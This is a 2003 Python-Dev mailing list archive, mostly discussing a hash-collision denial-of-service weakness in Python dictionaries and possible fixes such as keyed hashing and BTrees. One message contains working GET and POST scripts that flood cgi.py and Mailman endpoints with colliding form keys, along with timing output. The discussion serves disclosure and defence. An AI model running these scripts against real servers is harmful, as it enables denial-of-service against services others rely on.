References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <20030530204000.GH27502@epoch.metaslash.com> <20030530210430.GI27502@epoch.metaslash.com>
Message-ID: <009501c326fa$fc8bb680$125ffea9@oemcomputer>

> The patch below fixes the problem by not optimizing while 1:pass.  
> Seems kinda hacky though.
> 
> Neal

My version of the patch and a testcase are on SF at
www.python.org/sf/746376 if anyone wants to take
a look.

While we're focused on the compiler, there is a
nasty one still outstanding that relates to the
fast_function() optimization:
www.python.org/sf/733667


Raymond Hettinger



From python@rcn.com  Fri May 30 23:47:47 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 30 May 2003 18:47:47 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <1054327408.2917.9.camel@slothrop.zope.com> <20030530222204.GB404@glacier.arctrix.com>
Message-ID: <00ab01c326fd$7e584000$125ffea9@oemcomputer>

[Neil S]
> I think the right fix is to make JUMP_ABSOLUTE not bypass the test for
> pending exceptions.  

Yes.  That's the correct fix because it handles all cases including:

     while 1:
        x=1      

Please go ahead and patch it up.


Raymond


From tim.one@comcast.net  Sat May 31 00:07:38 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 30 May 2003 19:07:38 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oyd4r3cl86x.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>

[Scott Crosby]
> ...
> Have you done benchmarking to prove that string_hash is in fact an
> important hotspot in the python interpreter?

It depends on the specific application, of course.  The overall speed of
dicts is crucial, but in many "namespace" dict apps the strings are
interned, implying (among other things) that a hash code is computed only
once per string.  In those apps the speed of the string hash function isn't
so important.  Overall, though, I'd welcome a faster string hash, and I
agree that Python's isn't particularly zippy.

OTOH, it's just a couple lines of C that run fine on everything from Palm
Pilots to Crays, and have created no portability or maintenance headaches.
Browsing your site, you've got over 100KB of snaky C code to implement
hashing functions, some with known bugs, others with cautions about open
questions wrt platforms with different endianness and word sizes than the
code was initially tested on.  Compared to what Python is using now, that's
a maintenance nightmare.

Note that Python's hash API doesn't return 32 bits, it returns a hash code
of the same size as the native C long.  The multiplication gimmick doesn't
require any pain to do that.

Other points that arise in practical deployment:

+ Python dicts can be indexed by many kinds of immutable objects.
  Strings are just one kind of key, and Python has many hash functions.

+ If I understand what you're selling, the hash code of a given string
  will almost certainly change across program runs.  That's a very
  visible change in semantics, since hash() is a builtin Python
  function available to user code.  Some programs use hash codes to
  index into persistent (file- or database- based) data structures, and
  such code would plain break if the hash code of a string changed
  from one run to the next.  I expect the user-visible hash() would have
  to continue using a predictable function.

+ Some Python apps run for months, and universal hashing doesn't remove
  the possibility of quadratic-time behavior.  If I can poke at a
  long-running app and observe its behavior, over time I can deduce a
  set of keys that collide badly for any hashing scheme fixed when
  the program starts.  In that sense I don't believe this gimmick
  wholly plugs the hole it's trying to plug.

> If so, and doing one modulo operation per string is unacceptable,

If it's mod by a prime, probably.  Some architectures Python runs on require
hundreds of cycles to do an integer mod, and we don't have the resources to
construct custom mod-by-an-int shortcut code for dozens of obscure
architectures.

> then you may wish to consider Jenkins' hash. The linux kernel people
> are switching to using a keyed variant of Jenkins' hash. However,
> Jenkins', AFAIK, has no proofs that it is in fact universal. It,
> however, probably is safe.

Nobody writing a Python program *has* to use a dict.  That dicts have
quadratic-time worst-case behavior isn't hidden, and there's no cure for
that short of switching to a data structure with better worst-case bounds.
I certainly agree it's something for programmers to be aware of.  I still
don't see any reason for the core language to care about this, though.



From scrosby@cs.rice.edu  Sat May 31 00:56:51 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 30 May 2003 18:56:51 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
Message-ID: <oydznl4yon0.fsf@bert.cs.rice.edu>

On Fri, 30 May 2003 19:07:38 -0400, Tim Peters <tim.one@comcast.net> writes:

> [Scott Crosby]
> > ...
> > Have you done benchmarking to prove that string_hash is in fact an
> > important hotspot in the python interpreter?
> 
> It depends on the specific application, of course.  The overall speed of
> dicts is crucial, but in many "namespace" dict apps the strings are
> interned, implying (among other things) that a hash code is computed only
> once per string.  In those apps the speed of the string hash function isn't
> so important.  Overall, though, I'd welcome a faster string hash, and I
> agree that Python's isn't particularly zippy.

Actually, at least on x86, it is faster than perl. On other platforms,
it may be somewhat slower.

> OTOH, it's just a couple lines of C that run fine on everything from Palm
> Pilots to Crays, and have created no portability or maintenance headaches.
> Browsing your site, you've got over 100KB of snaky C code to implement
> hashing functions, some with known bugs, others with cautions about open
> questions wrt platforms with different endianness and word sizes than the
> code was initially tested on.  Compared to what Python is using now, that's
> a maintenance nightmare.

Yes, I am aware of the problems with the UHASH code. Unfortunately, I
am not a hash function designer, that code is not mine, and I only use
it as a black box.

I also consider all code, until verified otherwise, to potentially
suffer from endianness, alignment, and 32/64 bit issues. Excluding
alignment issues (which I'm not sure whether to say that it's OK to
fail on strange alignments or not) it has passed *my* self-tests on
big endian and 64 bit.

> + Python dicts can be indexed by many kinds of immutable objects.
>   Strings are just one kind of key, and Python has many hash functions.
> 
> + If I understand what you're selling, the hash code of a given string
>   will almost certainly change across program runs.  That's a very
>   visible change in semantics, since hash() is a builtin Python
>   function available to user code.  Some programs use hash codes to
>   index into persistent (file- or database- based) data structures, and
>   such code would plain break if the hash code of a string changed
>   from one run to the next.  I expect the user-visible hash() would have
>   to continue using a predictable function.

The hash has to be keyed upon something. It is possible to store the
key in a file and reuse the same one across all runs. However,
depending on the universal hash function used, leaking pairs of
(input,hash(input)) may allow an attacker to determine the secret key,
and allow attack again. But yeah, preserving these semantics becomes
very messy. The hash-key becomes part of the system state that must be
migrated along with other data that depends on it.
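
A minimal sketch of keeping the key as persistent state (the file name
and key size are arbitrary, and random.randrange is not a
cryptographically strong source, so a real deployment would want
something better):

import os, random

KEY_FILE = 'hash-key.dat'    # hypothetical location for the secret key
if os.path.exists(KEY_FILE):
    key = open(KEY_FILE, 'rb').read()
else:
    # Generate the key once and reuse it on every run, so hash values
    # stay stable for any persistent data that depends on them.
    key = ''.join([chr(random.randrange(256)) for i in range(16)])
    open(KEY_FILE, 'wb').write(key)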

> + Some Python apps run for months, and universal hashing doesn't remove
>   the possibility of quadratic-time behavior.  If I can poke at a
>   long-running app and observe its behavior, over time I can deduce a

I argued on linux-kernel with someone else that this was extremely
unlikely. It requires the latency of a collision/non-collision being
noticeable over a noisy network stack and system. In almost
all cases, for short inputs, the cost of a single L2 cache miss far
exceeds that of hashing.

A more serious danger is an application that leaks actual hash values.

> If it's mod by a prime, probably.

I'd benchmark it in practice; microbenchmarking on a SPARC says that
it is rather expensive. However, on x86, the cost of an L2 cache
miss exceeds the cost of hashing a small string. You'd have a better
idea what impact this might have on the total runtime of the system in
the worst case.

> > then you may wish to consider Jenkins' hash. The linux kernel people
> > are switching to using a keyed variant of Jenkins' hash. However,
> > Jenkins', AFAIK, has no proofs that it is in fact universal. It,
> > however, probably is safe.
> 
> Nobody writing a Python program *has* to use a dict.  That dicts have
> quadratic-time worst-case behavior isn't hidden, and there's no cure for

Agreed, many have realized over the years that hash tables can have
quadratic behavior in an adversarial environment. It isn't
hidden. Cormen, Leiserson, and Rivest even warn about this in their
seminal algorithms textbook in 1991. It *is* obvious when thought of,
but the reason I was able to ship out so many vulnerability reports
yesterday was because few actually *have* thought of that
deterministic worst-case when writing their programs. I predict this
trend to continue.

I like hash tables a lot: with UH, their time bounds are randomized
but pretty tight, and their constant factors are far better than those
of balanced binary trees.

Scott


From guido@python.org  Sat May 31 01:41:54 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 30 May 2003 20:41:54 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: "Your message of Fri, 30 May 2003 19:07:38 EDT."
 <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
Message-ID: <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>

> + If I understand what you're selling, the hash code of a given string
>   will almost certainly change across program runs.  That's a very
>   visible change in semantics, since hash() is a builtin Python
>   function available to user code.  Some programs use hash codes to
>   index into persistent (file- or database- based) data structures, and
>   such code would plain break if the hash code of a string changed
>   from one run to the next.  I expect the user-visible hash() would have
>   to continue using a predictable function.

Of course, such programs are already vulnerable to changes in the hash
implementation between Python versions (which has happened before).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Sat May 31 04:11:45 2003
From: barry@python.org (Barry Warsaw)
Date: 30 May 2003 23:11:45 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3 (final)
Message-ID: <1054350704.14645.16.camel@geddy>

I'm happy to announce the release of Python 2.2.3 (final).  This is a
bug fix release for the stable Python 2.2 code line.  It contains more
than 40 bug fixes and memory leak patches since Python 2.2.2, and all
Python 2.2 users are encouraged to upgrade.

The new release is available here:

        http://www.python.org/2.2.3/

For full details, see the release notes at

        http://www.python.org/2.2.3/NEWS.txt

There are a small number of minor incompatibilities with Python 2.2.2;
for details see:

        http://www.python.org/2.2.3/bugs.html

Perhaps the most important is that the Bastion.py and rexec.py modules
have been disabled, since we do not deem them to be safe.

As usual, a Windows installer and a Unix/Linux source tarball are made
available.  The documentation has been updated as well, and is available
both on-line and in many different formats. At the moment, no Mac
version or Linux RPMs are available, although I expect them to appear
soon.

On behalf of Guido, I'd like to thank everyone who contributed to this 
release, and who continue to ensure Python's success.

Enjoy,
-Barry




From jepler@unpythonic.net  Sat May 31 14:05:06 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 31 May 2003 08:05:06 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net> <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030531130503.GA16185@unpythonic.net>

On Fri, May 30, 2003 at 08:41:54PM -0400, Guido van Rossum wrote:
> Of course, such programs are already vulnerable to changes in the hash
> implementation between Python versions (which has happened before).

Is there at least a guarantee that the hashing algorithm won't change in a
bugfix release?  For instance, can I depend that
	python222 -c 'print hash(1), hash("a")'
	python223 -c 'print hash(1), hash("a")'
will both output the same thing, even if
	python23 -c 'print hash(1), hash("a")'
and
	python3000 -c 'print hash(1), hash("a")'
may print something different?

Jeff


From pje@telecommunity.com  Sat May 31 14:17:16 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Sat, 31 May 2003 09:17:16 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydwug814ac.fsf@bert.cs.rice.edu>
References: <20030530200021.GB30507@unpythonic.net>
 <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
 <oyd4r3cl86x.fsf@bert.cs.rice.edu>
 <20030530200021.GB30507@unpythonic.net>
Message-ID: <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>

At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:

>The python community will have to judge whether the performance
>difference of the current hash is worth the risk of the attack.

Note that the "community" doesn't really have to judge.  An individual 
developer can, if they have an application they deem vulnerable, do 
something like this:

class SafeString(str):
     def __hash__(self):
         # code to return a hash code

safe = SafeString(string_from_untrusted_source)

and then use only these "safe" strings as keys for a given dictionary.  Or, 
with a little more work, they can subclass 'dict' and make a dictionary 
that converts its keys to "safe" strings.
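
To make that concrete, here is one way the sketch above might be filled
in.  The keyed multiplicative hash is purely illustrative (not a vetted
universal hash), and only __getitem__/__setitem__ are wrapped, so plain
str keys shouldn't be mixed into the same dictionary:

import random

_SECRET = random.randint(1, 0x7FFFFFFE) | 1   # per-process secret multiplier

class SafeString(str):
    def __hash__(self):
        # Keyed variant of a simple multiplicative string hash; without
        # knowing _SECRET an attacker can't precompute collisions.
        h = long(_SECRET)
        for ch in self:
            h = ((h * 1000003L) & 0x7FFFFFFFL) ^ ord(ch)
        return int(h) ^ len(self)

class SafeDict(dict):
    def __setitem__(self, key, value):
        if isinstance(key, str):
            key = SafeString(key)
        dict.__setitem__(self, key, value)
    def __getitem__(self, key):
        if isinstance(key, str):
            key = SafeString(key)
        return dict.__getitem__(self, key)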

As far as current vulnerability goes, I'd say that the most commonly 
available attack point for this would be CGI programs that accept POST 
operations.  A POST can supply an arbitrarily large number of form field keys.

If you can show that the Python 'cgi' module is vulnerable to such an 
attack, in a dramatic disproportion to the size of the data transmitted 
(since obviously it's as much of a DoS to flood a script with a large 
quantity of data), then it might be worth making changes to the 'cgi' 
module, or at least warning the developers of alternatives to CGI (e.g. 
Zope, Quixote, SkunkWeb, CherryPy, etc.) that alternate hashes might be a 
good idea.

But based on the discussion so far, I'm not sure I see how this attack 
would produce an effect that was dramatically disproportionate to the 
amount of data transmitted.



From dave@boost-consulting.com  Sat May 31 15:35:27 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 31 May 2003 10:35:27 -0400
Subject: [Python-Dev] more-precise instructions for "Python.h first"?
Message-ID: <uvfvrrxow.fsf@boost-consulting.com>

Boost.Python is now trying hard to accommodate the "Python.h before
system headers rule".  Unfortunately, we still need a wrapper around
Python.h, at least for some versions of Python, so that we can
work around some issues like:

    //
    // Python's LongObject.h helpfully #defines ULONGLONG_MAX for us
    // even when it's not defined by the system which confuses Boost's
    // config
    //

To cope with that correctly, we need to see <limits.h> (a system
header) before longobject.h.  Currently, we're including <limits.h>,
then <patchlevel.h>, well, and then the wrapper gets a little
complicated adjusting for various compilers.

Anyway, the point is that I'd like to have the rule changed to "You
have to include Python.h or xxxx.h before any system header" where
xxxx.h is one of the other existing headers #included in Python.h that
is responsible for setting up whatever macros cause this
inclusion-order requirement in the first place (preferably not
LongObject.h!)  That way I might be able to get those configuration
issues sorted out without violating the #inclusion order rule.  What
I have now seems to work, but I'd rather do the right thing (TM).

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From scrosby@cs.rice.edu  Sat May 31 16:48:28 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 31 May 2003 10:48:28 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>
References: <20030530200021.GB30507@unpythonic.net>
 <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
 <oyd4r3cl86x.fsf@bert.cs.rice.edu>
 <20030530200021.GB30507@unpythonic.net>
 <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>
Message-ID: <oydwug7i0c3.fsf@bert.cs.rice.edu>

On Sat, 31 May 2003 09:17:16 -0400, "Phillip J. Eby" <pje@telecommunity.com> writes:

> At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:

> But based on the discussion so far, I'm not sure I see how this attack
> would produce an effect that was dramatically disproportionate to the
> amount of data transmitted.

I apologize for not having this available earlier, but a corrected
file of 10,000 inputs is now available and shows the behavior I
claimed. (Someone else independently reimplemented the attack and has
sent me a corrected set for python.) With 10,000 inputs, python
requires 19 seconds to process instead of .2 seconds. A file of half
the size requires 4 seconds, showing the quadratic behavior, as with
the case of perl. (Benchmarked on a P2-450) I thus predict that twice
the inputs would take about 80 seconds.

I can only guess what python applications might experience an
interesting impact from this, so I'll be silent. However, here are the
concrete benchmarks.

Scott


From martin@v.loewis.de  Sat May 31 17:28:25 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 31 May 2003 18:28:25 +0200
Subject: [Python-Dev] more-precise instructions for "Python.h first"?
In-Reply-To: <uvfvrrxow.fsf@boost-consulting.com>
References: <uvfvrrxow.fsf@boost-consulting.com>
Message-ID: <m34r3baxna.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> Anyway, the point is that I'd like to have the rule changed to "You
> have to include Python.h or xxxx.h before any system header" where
> xxxx.h is one of the other existing headers #included in Python.h that
> is responsible for setting up whatever macros cause this
> inclusion-order requirement in the first place (preferably not
> LongObject.h!)

If I understand correctly, you want to follow the rule "I want to
change things as long as it continues to work for me". For that, you
don't need any permission. If it works for you, you can ignore any
rules you feel uncomfortable with.

The rule is there for people who don't want to understand the specific
details of system configuration. If you manage to get a consistent
configuration in a different way, just go for it. You should make sure
then that your users can't run into problems, though.

Regards,
Martin



From guido@python.org  Sat May 31 17:55:21 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 31 May 2003 12:55:21 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: "Your message of Sat, 31 May 2003 08:05:06 CDT."
 <20030531130503.GA16185@unpythonic.net>
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net>
 <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net>
 <20030531130503.GA16185@unpythonic.net>
Message-ID: <200305311655.h4VGtLk21998@pcp02138704pcs.reston01.va.comcast.net>

> On Fri, May 30, 2003 at 08:41:54PM -0400, Guido van Rossum wrote:
> > Of course, such programs are already vulnerable to changes in the hash
> > implementation between Python versions (which has happened before).
> 
> Is there at least a guarantee that the hashing algorithm won't change in a
> bugfix release?  For instance, can I depend that
> 	python222 -c 'print hash(1), hash("a")'
> 	python223 -c 'print hash(1), hash("a")'
> will both output the same thing, even if
> 	python23 -c 'print hash(1), hash("a")'
> and
> 	python3000 -c 'print hash(1), hash("a")'
> may print something different?

That's a reasonable assumption, yes.  We realize that changing the
hash algorithm is a feature change, even if it is a very subtle one.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler@unpythonic.net  Sat May 31 18:42:17 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sat, 31 May 2003 12:42:17 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydwug7i0c3.fsf@bert.cs.rice.edu>
References: <20030530200021.GB30507@unpythonic.net> <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net> <oydisrtyy42.fsf@bert.cs.rice.edu> <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net> <oyd4r3cl86x.fsf@bert.cs.rice.edu> <20030530200021.GB30507@unpythonic.net> <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com> <oydwug7i0c3.fsf@bert.cs.rice.edu>
Message-ID: <20030531174214.GA18222@unpythonic.net>

On Sat, May 31, 2003 at 10:48:28AM -0500, Scott A Crosby wrote:
> On Sat, 31 May 2003 09:17:16 -0400, "Phillip J. Eby" <pje@telecommunity.com> writes:
> 
> > At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:
> 
> > But based on the discussion so far, I'm not sure I see how this attack
> > would produce an effect that was dramatically disproportionate to the
> > amount of data transmitted.
> 
> I apologize for not having this available earlier, but a corrected
> file of 10,000 inputs is now available and shows the behavior I
> claimed. (Someone else independently reimplemented the attack and has
> sent me a corrected set for python.) With 10,000 inputs, python
> requires 19 seconds to process instead of .2 seconds. A file of half
> the size requires 4 seconds, showing the quadratic behavior, as with
> the case of perl. (Benchmarked on a P2-450) I thus predict that twice
> the inputs would take about 80 seconds.
> 
> I can only guess what python applications might experience an
> interesting impact from this, so I'll be silent. However, here are the
> concrete benchmarks.

The CGI module was mentioned earlier as a possible "problem area" for this
attack, so I wrote a script that demonstrates it, using Scott's list of
hash-colliding strings.  I do see quadratic growth in runtime.  When running
the attack on mailman, however, I don't see such a large runtime, and the
growth in runtime appears to be linear.  This may be because the mailman
installation is running on 2.1 (?) and requires a different set of attack
strings.

I used the cgi.py "self-test" script (the one you get when you run cgi.py
*as* a cgi script) on the CGIHTTPServer.py server, and sent a long URL
of the form
	test.cgi?x=1&<colliding key 1>=1&<colliding key 2>=1&...
I looked at the size of the URL, the size of the response, and the time to
transfer the response.

My system is a mobile Pentium III running at 800MHz, RedHat 9, Python
2.2.2.

The mailman testing system is a K6-2 running at 350MHz, RedHat 7.1, Python
2.1.

In the results below, the very fast times and low reply sizes are due
to the fact that the execve() call fails for argv+envp>128kb.  This
limitation might not exist if the CGI was POSTed, or running as fcgi,
mod_python, or another system which does not pass the GET form contents
in the environment.

Here are the results, for various query sizes:
########################################################################
# Output 1: Running attack in listing 1 on cgi.py
# Parameters in query: 0
Length of URL: 40
Length of contents: 2905
Time for request: 0.537268042564

# Parameters in query: 1
Length of URL: 64
Length of contents: 3001
Time for request: 0.14549601078

# Parameters in query: 10
Length of URL: 307
Length of contents: 5537
Time for request: 0.151428103447

# Parameters in query: 100
Length of URL: 2737
Length of contents: 31817
Time for request: 0.222425937653

# Parameters in query: 1000
Length of URL: 27037
Length of contents: 294617
Time for request: 4.47611808777

# Parameters in query: 2000
Length of URL: 54037
Length of contents: 586617
Time for request: 18.8749380112

# Parameters in query: 4800
Length of URL: 129637
Length of contents: 1404217
Time for request: 106.951847911

# Parameters in query: 5000
Length of URL: 135037
Length of contents: 115
Time for request: 0.516644954681

# Parameters in query: 10000
Length of URL: 270037
Length of contents: 115
Time for request: 1.01809692383

When I attempted to run the attack against Apache 1.3/Mailman, any
moderately-long GET requests provoked an Apache error message.

########################################################################
# Listing 1: test_cgi.py
import urllib, time

def time_url(url):
	t = time.time()
	u = urllib.urlopen(url)
	contents = u.read()
	t1 = time.time()
	print "Length of URL:", len(url)
	print "Length of contents:", len(contents)
	print contents[:200]
	print "Time for request:", t1-t
	print

#URL="http://www.example.com/mailman/subscribe/test"
URL="http://localhost:8000/cgi-bin/test.cgi"

items = [line.strip() for line in open("python-attack").readlines()]
for i in (0, 1, 10, 100, 1000, 2000, 4800, 5000, 10000):
	print "# Parameters in query:", i
	url = URL+"?x"
	url = url + "=1&".join(items[:i])
	time_url(url)
########################################################################

I re-wrote the script to use POST instead of GET, and again ran it on
cgi.py and mailman.  For some reason, using 0 or 1 items against
CGIHTTPServer.py seemed to hang.

########################################################################
# Output 2: Running attack in listing2 on cgi.py
# Parameters in query: 10
Length of URL: 38
Length of data: 272
Length of contents: 3543
Time for request: 0.314235925674

# Parameters in query: 100
Length of URL: 38
Length of data: 2702
Length of contents: 13894
Time for request: 0.218624949455

# Parameters in query: 1000
Length of URL: 38
Length of data: 27002
Length of contents: 117395
Time for request: 2.20617306232

# Parameters in query: 2000
Length of URL: 38
Length of data: 54002
Length of contents: 232395
Time for request: 9.92248606682

# Parameters in query: 5000
Length of URL: 38
Length of data: 135002
Length of contents: 577396
Time for request: 57.3930220604

# Parameters in query: 10000
Length of URL: 38
Length of data: 270002
Length of contents: 1152396
Time for request: 238.318212986

########################################################################
# Output 3: Running attack in listing2 on mailman
# Parameters in query: 10
Length of URL: 44
Length of data: 272
Length of contents: 852
Time for request: 0.938691973686

# Parameters in query: 100
Length of URL: 44
Length of data: 2702
Length of contents: 852
Time for request: 0.819067001343

# Parameters in query: 1000
Length of URL: 44
Length of data: 27002
Length of contents: 852
Time for request: 1.13541901112

# Parameters in query: 2000
Length of URL: 44
Length of data: 54002
Length of contents: 852
Time for request: 1.59714698792

# Parameters in query: 5000
Length of URL: 44
Length of data: 135002
Length of contents: 852
Time for request: 3.12452697754

# Parameters in query: 10000
Length of URL: 44
Length of data: 270002
Length of contents: 852
Time for request: 5.72900700569

########################################################################
# Listing 2: attack program using POST for longer URLs

import urllib2, time

def time_url(url, data):
	t = time.time()
	u = urllib2.urlopen(url, data)
	contents = u.read()
	t1 = time.time()
	print "Length of URL:", len(url)
	print "Length of data:", len(data)
	print "Length of contents:", len(contents)
	print "Time for request:", t1-t
	print

#URL="http://www.example.com/mailman/subscribe/test"
URL="http://localhost:8000/cgi-bin/test.cgi"

items = [line.strip() for line in open("python-attack").readlines()]
for i in (10, 100, 1000, 2000, 5000, 10000):
	print "# Parameters in query:", i
	data = "x" + "=1&".join(items[:i]) + "\r\n\r\n"
	time_url(URL, data)


From tim.one@comcast.net  Sat May 31 19:28:25 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 14:28:25 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEGBEIAB.tim.one@comcast.net>

[Phillip J. Eby]
> ...
> or at least warning the developers of alternatives to CGI (e.g. Zope,
> Quixote, SkunkWeb, CherryPy, etc.) that alternate hashes might be a good
> idea.

Don't know about SkunkWeb or CherryPy etc, but Zope and Quixote apps can use
ZODB's BTrees for mappings.  Insertion and lookup in a BTree have worst-case
log-time behavior, and no "bad" sets of keys exist for them.  The Buckets
forming the leaves of BTrees are vulnerable, though:  provoking
quadratic-time behavior in a Bucket only requires inserting keys in
reverse-sorted order, and sometimes apps use Buckets directly when they
should be using BTrees.
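
For anyone who hasn't tried them, a minimal sketch of using a BTree in
place of a dict (assuming ZODB's BTrees package is available; the data
here is made up):

from BTrees.OOBTree import OOBTree

untrusted_keys = ['spam', 'eggs', 'spam']   # stand-in for attacker-supplied input
counts = OOBTree()                          # log-time insertion and lookup
for key in untrusted_keys:
    counts[key] = counts.get(key, 0) + 1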

Using a data structure appropriate for the job at hand is usually a good
idea <wink>.



From python@rcn.com  Sat May 31 19:34:13 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 31 May 2003 14:34:13 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net> <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net> <20030531130503.GA16185@unpythonic.net> <200305311655.h4VGtLk21998@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <003b01c327a3$3c30f5e0$125ffea9@oemcomputer>

> > On Fri, May 30, 2003 at 08:41:54PM -0400, Guido van Rossum wrote:
> > > Of course, such programs are already vulnerable to changes in the hash
> > > implementation between Python versions (which has happened before).
> > 
> > Is there at least a guarantee that the hashing algorithm won't change in a
> > bugfix release?  For instance, can I depend that
> > python222 -c 'print hash(1), hash("a")'
> > python223 -c 'print hash(1), hash("a")'
> > will both output the same thing, even if
> > python23 -c 'print hash(1), hash("a")'
> > and
> > python3000 -c 'print hash(1), hash("a")'
> > may print something different?
> 
> That's a reasonable assumption, yes.  We realize that changing the
> hash algorithm is a feature change, even if it is a very subtle one.

For Scott's proposal to work, it would have to change the hash
value on every invocation of Python.  If not, colliding keys can
be found with a Monte Carlo method.

Raymond Hettinger



From tim.one@comcast.net  Sat May 31 19:50:01 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 14:50:01 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <20030531130503.GA16185@unpythonic.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGDEIAB.tim.one@comcast.net>

[Jeff Epler]
> Is there at least a guarantee that the hashing algorithm won't change
> in a bugfix release?

Guido said "yes" weakly, but the issue hasn't come up in recent times.  In
the past we've changed the hash functions for at least strings, tuples, and
floats, based on systematic weaknesses uncovered by real-life ordinary data.
OTOH, there's a requirement that, for objects of types that can be used as
dict keys, two objects that compare equal must deliver equal hash codes, so
people creating (mostly) number-like or (not sure if anyone does this)
string-like types have to duplicate the hash codes Python delivers for
builtin numbers and strings that compare equal to objects of their types.
For example, the author of a Rational class should arrange for

    hash(Rational(42, 1))

to deliver the same result as

    hash(42) == hash(42L) == hash(42.0) == hash(complex(42.0, 0.0))

Such code would break if we changed the int/long/float/complex hashes for
inputs that compare equal to integers.

Tedious exercise for the reader:  find a set of bad datetime objects in 2.3
("bad" in the sense of their hash codes colliding; on a box where hash()
returns a 32-bit int, there must be collisions, since datetime objects have
way more than 32 independent bits of state).
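
A brute-force sketch of one way to attack that exercise (illustrative
only; by the birthday paradox, random datetimes should yield a colliding
pair after very roughly 2**16 samples on a box with 32-bit hash codes):

import random
from datetime import datetime

seen = {}
while 1:
    d = datetime(random.randrange(1, 10000),   # year
                 random.randrange(1, 13),      # month
                 random.randrange(1, 28),      # day
                 random.randrange(24),         # hour
                 random.randrange(60),         # minute
                 random.randrange(60),         # second
                 random.randrange(1000000))    # microsecond
    h = hash(d)
    if h in seen and seen[h] != d:
        print "collision:", seen[h], "and", d
        break
    seen[h] = d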



From tim.one@comcast.net  Sat May 31 20:27:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 15:27:29 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydwug814ac.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGGEIAB.tim.one@comcast.net>

[Scott Crosby]
> ...
> Also, I'd like to thank Tim Peters for telling me about the potential
> of degradation that regular expressions may offer.

I'm acutely aware of that one because it burns people regularly.  These
aren't cases of hostile input, they're cases of innocently "erroneous"
input.  After maybe a year of experience, people using a backtracking regexp
engine usually figure out how to write a regexp that doesn't go
resource-crazy when parsing strings that *do* match.  Those are the inputs
the program expects.  But all inputs can suffer errors, and a regexp that
works well when the input matches can still go nuts trying to match a
non-matching string, consuming an exponential amount of time trying an
exponential number of futile backtracking possibilities.

